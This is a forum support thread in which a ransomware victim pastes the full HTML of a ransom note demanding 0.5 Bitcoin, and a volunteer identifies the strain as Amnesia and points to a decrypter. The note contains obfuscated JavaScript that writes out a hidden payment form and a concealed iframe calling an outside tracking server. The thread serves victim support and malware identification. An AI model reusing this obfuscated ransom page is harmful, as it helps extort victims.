Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Ransomware file extension .02 leaves ransome note in RECOVER-FILES.HTML


  • This topic is locked This topic is locked
3 replies to this topic

#1 LasalPaul

LasalPaul

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:01:53 AM

Posted 09 May 2017 - 04:03 PM

Hi everybody

 

Yesterday i had a ransomware attack.

I dont know how it started, but i believe i clicked on the "recovery" file saved in the laptops in D drive.

After the attack the icon of the file has changed.

All my doc, jpg, gif etc have been encrypted and saved with .02 extension.

I have attached the screenshot of the ransom note

 

Please let me know what type it is? any tool available for recovery?

 

Thanks for the support.

 

Here is the code of the html file

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
  <head>
    <meta charset="utf-8">

    <title></title>

  </head>

  <body>
<center>
<br><br>
    <div><h2>Your files are Encrypted!</h2></div>

    <div class="note private">

<br><br>
<div class="bold">For data recovery needs decryptor.</div>
<br>
<div>To buy the decryptor, you must pay the cost of: <font color="#FF0000"> <b>0.5</b></font> Bitcoin<br><div>
<br><br>
<script> function msjcsjwhihqeb(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexOf(search[k]);while(i>-1){subject=subject.replace(search[k],replace[k]);i=subject.indexOf(search[k],i)}}return subject} var acrkiadnudrqwb = '<nvFnvOnvRnaqMnv naqrnaqonvlnaqenv=nv"nvfnaqonvrnaqmnaq"nv nvanaqcnaqtnvinvonaqnnv=naq"nvhnaqtnvtnaqpnvsnaq:nv/naq/nvnnaq2naq2naq4naqenaqznaqvnvhnvgnaq4naqsnaqgnaqynaqanaqmnvbnv.naqonvnnaqinvonaqnnv.nvtnaqonaq/nvenaqfnvwnaqdnaqanaqqnaq.naqpnaqhnaqpnaq"nv naqmnaqenaqtnaqhnvonvdnv=nv"nvPnaqOnaqSnaqTnv"nv naqtnaqanvrnvgnvenaqtnv=naq"naq_naqbnvlnvanvnnvknaq"nv>nv';var ysyflzapqmjn = msjcsjwhihqeb('nv', '', acrkiadnudrqwb); var btxapgbxmtnfk = msjcsjwhihqeb('naq', '', ysyflzapqmjn); document.write(btxapgbxmtnfk);</script>
<INPUT TYPE="hidden" NAME="fb" VALUE="31<pre>6300606882535695776494998484220200277923817991243925842714546330534831257727049302977756496949455923
4181376328046581741544657564433824671479590311345302661986767622342033152884992186906386421939803267
2715142420698365807299062447164115573713812746405408830117753521379651894312206670730149150754136554
8111198807086644228736239939597295843286322792906824002661049384931873888612526913275962132241922724
0510907607483214223593789649051375613288036138185012292121189242047737334391576215988506839708411046
9953764416021316958391207705148048226769845110179914876342115302600090951562005807443047243419097142
25863536256536717</pre>">
<INPUT TYPE="hidden" NAME="nu" VALUE="102">
<INPUT TYPE="hidden" NAME="su" VALUE="0.5">
<button type="submit" >Buy Decryptor</button>
</form>
<br>
Free decryption as guarantee.<br>
Before paying you can send us 1 file for free decryption.<br>
To send a message or file use this form:<br>
<script type="text/javascript" src="http://assets.freshdesk.com/widget/freshwidget.js"></script>
<style type="text/css" media="screen, projection">
    @import url(http://assets.freshdesk.com/widget/freshwidget.css);
</style>
<iframe title="Feedback Form" class="freshwidget-embedded-form" id="freshwidget-embedded-form" src="https://decrypt.freshdesk.com/widgets/feedback_widget/new?&widgetType=embedded&formTitle=Message++or+File&submitTitle=SEND&submitThanks=the+message+is+received&screenshot=no&searchArea=no" scrolling="no" height="400px" width="300" frameborder="0" >
</iframe>
</center>
</div>
</center>
<script> function qxszzqudao(search,replace,subject){if(!(replace instanceof Array)){replace=new Array(replace);if(search instanceof Array){while(search.length>replace.length){replace[replace.length]=replace[0]}}}if(!(search instanceof Array))search=new Array(search);while(search.length>replace.length){replace[replace.length]=''}if(subject instanceof Array){for(k in subject){subject[k]=str_replace(search,replace,subject[k])}return subject}for(var k=0;k<search.length;k++){var i=subject.indexOf(search[k]);while(i>-1){subject=subject.replace(search[k],replace[k]);i=subject.indexOf(search[k],i)}}return subject} var alsfimsqwufs = '<hjepihjepfddvmrhjepahjepmhjepeddvm hjepsddvmtddvmyhjeplddvmehjep=hjep"hjepwddvmihjepdhjepthjephddvm:ddvm1hjep;hjephddvmeddvmihjepgddvmhddvmtddvm:hjep1hjep"ddvm hjepwhjepiddvmdddvmtddvmhddvm=hjep"hjep1ddvm"ddvm hjepsddvmcddvmrddvmoddvmlhjeplddvmihjepnddvmgddvm=hjep"hjepnhjepoddvm"ddvm hjepfddvmrhjepaddvmmddvmeddvmbhjepohjeprddvmdddvmeddvmrddvm=hjep"ddvmnhjepoddvm"hjep hjepmddvmaddvmrhjepgddvmiddvmnhjepwhjepihjepdhjepthjephddvm=ddvm"ddvm0ddvm"ddvm hjepmddvmaddvmrddvmgddvmiddvmnddvmhddvmehjepiddvmgddvmhhjepthjep=hjep"hjep0hjep"hjep hjepshjeprddvmcddvm=ddvm"ddvmhhjeptddvmthjeppddvm:ddvm/hjep/ddvmshjepehjeprhjepvddvm1hjep.ddvmxhjepyddvmzddvm/hjepcddvmohjepuhjepnddvmtddvmeddvmrhjep.ddvmpddvmhddvmphjep?ddvmnhjepuhjep=ddvm1ddvm0ddvm2hjep&ddvmfddvmbhjep=ddvmwhjepwhjepwddvm"hjep>hjep<ddvm/hjepiddvmfhjeprddvmahjepmddvmeddvm>ddvm';var dbikvcmyzern = qxszzqudao('hjep', '', alsfimsqwufs); var djejsvzqdbrj = qxszzqudao('ddvm', '', dbikvcmyzern); document.write(djejsvzqdbrj);</script>
</body>
</html>   


Edited by LasalPaul, 09 May 2017 - 04:06 PM.


BC AdBot (Login to Remove)

 


#2 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,555 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:06:53 PM

Posted 09 May 2017 - 04:09 PM

It's Amnesia, check the support topic here: https://www.bleepingcomputer.com/forums/t/645659/amnesia-ransomware-amnesia-how-to-recover-encrypted-filestxt-support-topic/

 

The Emsisoft decrypter can decrypt files if you have an encrypted file and it's original; however, for now, it does not support decrypting the filenames, and you have to "force" decryption by changing the extensions to ".amnesia" for now. Fabian is still working out how to decrypt the filenames.


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#3 LasalPaul

LasalPaul
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:01:53 AM

Posted 09 May 2017 - 05:11 PM

Thanks for your quick reply. Let me check with the decrypter available.



#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,733 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:07:53 PM

Posted 10 May 2017 - 07:17 AM

Rather than have everyone with individual topics, it would be best (and more manageable for staff) if you posted any more questions, comments or requests for assistance in the above support topic discussion...it includes experiences by experts, a variety of IT consultants, end users and company reps who have been affected by ransomware infections. To avoid unnecessary confusion, this topic is closed.

Thanks
The BC Staff
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users